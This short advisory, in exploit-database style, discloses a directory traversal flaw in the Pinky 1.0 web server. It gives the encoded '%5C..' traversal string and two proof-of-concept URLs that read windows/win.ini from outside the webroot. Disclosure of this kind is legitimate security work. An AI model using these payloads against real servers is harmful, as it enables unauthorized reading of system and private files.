------------------------------------------------------------------------
Software................Pinky 1.0
Vulnerability...........Directory Traversal
Download................http://www.yellosoft.us/pinky
Release Date............9/16/2010
Tested On...............Windows XP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A directory traversal vulnerability in Pinky 1.0 can be exploited to
read files outside of the webroot directory.


--Exploit--

%5C..


--PoC--

http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows/win.ini